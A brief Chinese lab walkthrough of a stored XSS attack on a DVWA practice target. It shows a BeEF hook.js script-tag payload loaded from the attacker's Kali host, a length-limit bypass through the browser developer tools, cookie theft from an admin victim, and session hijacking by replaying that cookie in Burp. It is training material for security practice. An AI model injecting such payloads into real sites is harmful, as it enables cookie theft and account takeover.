本实验用到的环境为:DVWA靶场
服务器:winserver 2022 (192.168.25.156)
攻击机:kali
受害者:win 10
1.
kali攻击机打开beef-xss
恶意代码:
<script src="http://kali的ip:3000/hook.js"></script>
2.
攻击机登录dvwa,打开存在xss漏洞的页面
攻击机登录的账户为smithy
输入恶意代码
注意:这个输入框需要按F12在前端代码中修改最长字符
3.
受害者访问该页面
受害者登录的账户为admin
访问到被注入恶意代码的页面,这时受害者还没有察觉到。
4.
攻击机的beef页面中发现受害者上钩,获得受害者的cookie
5.
访问登录页面192.168.25.156/dvwa/index.php
用burp抓包
用beef截获到受害者的cookie替换登录数据包的cookie,使用受害者的身份完成登录
实验结束